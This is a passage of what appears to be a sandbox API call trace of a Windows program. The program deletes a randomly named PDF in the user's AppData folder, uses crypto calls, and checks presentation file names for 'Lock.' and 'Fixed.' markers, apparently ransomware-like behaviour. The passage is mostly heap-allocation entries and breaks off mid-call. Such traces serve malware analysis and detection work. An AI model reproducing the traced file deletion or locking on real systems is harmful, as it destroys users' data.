[0151.763] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.764] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0151.764] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0151.764] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.764] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.764] FreeLibrary (hLibModule=0x76390000) returned 1 [0151.764] CloseHandle (hObject=0x4a4) returned 1 [0151.765] CloseHandle (hObject=0x4f8) returned 1 [0151.767] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.767] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.767] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UGbEnsFdWrF0NcSzWk2.pdf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\UGbEnsFdWrF0NcSzWk2.pdf", lpFilePart=0x8cedf4*="UGbEnsFdWrF0NcSzWk2.pdf") returned 0x37 [0151.768] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UGbEnsFdWrF0NcSzWk2.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ugbensfdwrf0ncszwk2.pdf")) returned 0x20 [0151.768] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UGbEnsFdWrF0NcSzWk2.pdf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61a48910, ftCreationTime.dwHighDateTime=0x1d5cd48, ftLastAccessTime.dwLowDateTime=0x402b390, ftLastAccessTime.dwHighDateTime=0x1d5cfaf, ftLastWriteTime.dwLowDateTime=0x402b390, ftLastWriteTime.dwHighDateTime=0x1d5cfaf, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="UGbEnsFdWrF0NcSzWk2.pdf", cAlternateFileName="UGBENS~1.PDF")) returned 0x9e2278 [0151.768] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UGbEnsFdWrF0NcSzWk2.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ugbensfdwrf0ncszwk2.pdf")) returned 1 [0151.769] FindNextFileW (in: hFindFile=0x9e2278, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61a48910, ftCreationTime.dwHighDateTime=0x1d5cd48, ftLastAccessTime.dwLowDateTime=0x402b390, ftLastAccessTime.dwHighDateTime=0x1d5cfaf, ftLastWriteTime.dwLowDateTime=0x402b390, ftLastWriteTime.dwHighDateTime=0x1d5cfaf, nFileSizeHigh=0x0, nFileSizeLow=0x4d1e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="UGbEnsFdWrF0NcSzWk2.pdf", cAlternateFileName="UGBENS~1.PDF")) returned 0 [0151.769] FindClose (in: hFindFile=0x9e2278 | out: hFindFile=0x9e2278) returned 1 [0151.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.772] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0151.772] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0151.772] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0151.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0151.774] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UGbEnsFdWrF0NcSzWk2.pdf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\UGbEnsFdWrF0NcSzWk2.pdf", lpFilePart=0x8cf650*="UGbEnsFdWrF0NcSzWk2.pdf") returned 0x37 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0151.774] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UGbEnsFdWrF0NcSzWk2.pdf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ugbensfdwrf0ncszwk2.pdf")) returned 0xffffffff [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0151.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.774] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0151.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7-K_kNP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7-K_kNP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-K_kNP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K_kNP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_kNP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kNP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NP-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0151.775] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0151.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77aa8 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7-K_kNP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7-K_kNP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-K_kNP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K_kNP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_kNP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kNP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NP-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.776] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0151.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0151.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61b0 | out: hHeap=0x2af0000) returned 1 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.777] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0151.777] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0151.777] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0151.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0151.778] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0151.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 